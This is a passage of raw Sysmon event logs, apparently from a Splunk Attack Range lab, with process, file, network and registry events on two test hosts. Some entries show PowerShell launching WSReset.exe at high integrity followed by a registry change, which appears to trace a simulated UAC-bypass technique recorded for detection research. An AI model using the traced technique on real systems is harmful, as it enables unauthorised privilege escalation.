08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:58.873{466BC892-F7DB-60EB-DC7D-00000000CF01}42528636Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\Windows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001054137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.888{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\System32\WSReset.exe10.0.14393.4169 
(rs1_release.210107-1130)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\system32\WSReset.exe" C:\Temp\test\ATTACKRANGE\Administrator{466BC892-F7DA-60EB-282E-0C0500000000}0x50c2e283HighMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001054136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.857{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7337C17B107A9B9420E569A736403EB8,SHA256=4784E24BE320674EA6CC99DE7057CD9BD46A46AD306C59AC29C0D729630387E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:58.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F69112CE910E4E8E15EA3A2C121B5A3,SHA256=023F5EF141D29D00C7DCB0B8BD4FAAEED72D35137F6654FD27C8F7E2B77804E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:58.378{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57440-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:59.152{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7B87BCD8849D34F017C4B1493412F57,SHA256=04506B911971F8A9801FF5855A5757F054E883183F351E7E058BBF98E0C89CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.841{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=14F941B9B9BA1D6958F200F66B9DF629,SHA256=36C47F8A4AEBF1E113AD8E002AC849E97B314AE84DB679E45565D53EA3D0A21E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.818{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61941-false10.0.1.12-8089- 10341000x80000000000000001054169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:59.165{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.164{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.164{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:59.073{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.057{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:59.038{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.035{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:59.035{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:59.020{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.020{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:59.004{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:59.003{466BC892-F7E7-60EB-E77D-00000000CF01}5692C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F7DA-60EB-282E-0C0500000000}0x50c2e283HighMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 13241300x80000000000000001054153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:05:58.988{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell 
Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFFBinary Data 23542300x8000000000000000810047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:00.152{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB679D190438994B7A725346B9182E2,SHA256=CE9B498170A359CDBF0FFC779C7D908995C12CE24B9E3DBA570AF4471B9E49CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.661{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=0B7A84FDCDCDAFBF8BB1D94C4BCE4E07,SHA256=CFEC39E59D53BF82CE53AAAC9C6B3CCDD0FFF720001086D2CAA374648B23D9DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.588{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61942-false10.0.1.12-8000- 23542300x80000000000000001054174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2710B355ACF1566F5215F3D2D5D5AB07,SHA256=E73E535AE6985E9B5D5D712B513D0575968083D676561460F822A56A0C307F61,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B72FC21FE54C42785E04F30F96A5834,SHA256=694F4D398076F12D504789964DF5E7EA8279BA4660110955108B5F71720D648B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:00.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F5CC56C17CC11442EC9E931CDF9F7C1,SHA256=B39EDA0527259399F987A06F98DBAA3D31C2EDB883A5125A0630078FDD9C848B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:01.190{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 